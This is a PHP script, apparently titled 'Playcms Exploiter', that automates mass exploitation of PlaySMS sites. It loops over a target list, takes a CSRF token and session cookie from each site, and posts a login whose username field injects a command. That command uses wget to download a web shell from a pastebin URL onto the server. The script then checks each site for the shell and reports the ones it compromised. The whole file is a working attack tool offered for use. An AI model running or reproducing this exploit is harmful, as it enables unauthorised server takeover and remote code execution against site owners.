Playcms Exploiter [exp.php]

1. <?php
2. /**
3. * @WibuHeker | https://github.com/wibuheker | PlaySMS Auto Upload Shell
4. */
5. require_once 'Curl.php';
6.  
7. enterlist:
8. $listname = readline("Enter list : ");
9. if(empty($listname) || !file_exists($listname)) {
10. echo"[?] list not found".PHP_EOL;
11. goto enterlist;
12. }
13.  
14. $lists = explode("\n", str_replace("\r", "", file_get_contents($listname)));
15. foreach ($lists as $site) {
16. $curl = new Curl();
17. $curl->URL = $site . "/index.php";
18. $curl->GET();
19. if ($curl->Response()->status_code === 302) {
20. $urlStore = $site . "/" . $curl->Response()->headers->location;
21. $curl->URL = $urlStore;
22. $curl->GET();
23. if (preg_match('/name="X-CSRF-Token"/', $curl->Response()->body)) {
24. preg_match_all('/name="X-CSRF-Token" value="(?<csrf>[a-z0-9"]+)">/', $curl->Response()->body, $match, PREG_SET_ORDER, 0);
25. $csrf = $match[0]['csrf'];
26. $cookie = $curl->Response()->headers->set_cookie;
27. $curl->URL = $urlStore;
28. $curl->SetHeaders(
29. array(
30. "Cookie: {$cookie}"
31. )
32. );
33. $curl->Follow();
34. $curl->POST("X-CSRF-Token={$csrf}&username={{`wget https://pastebin.com/raw/CUc4w3hc -O ae.php`}}&password=");
35. if ($curl->Response()->status_code === 200) {
36. $curl->URL = $site . "/ae.php";
37. $curl->GET();
38. if (preg_match('/azzatssins/', $curl->Response()->body)) {
39. echo $site . "/ae.php -> SHELL" . PHP_EOL;
40. } else {
41. echo $site . " Failed Upload Shell" . PHP_EOL;
42. }
43. } else {
44. echo $site . " Unknow Error! Cant execute command!" . PHP_EOL;
45. }
46. } else {
47. echo $urlStore . " -> Cannot retrive CSRF TOKEN!" . PHP_EOL;
48. }
49. }
50. }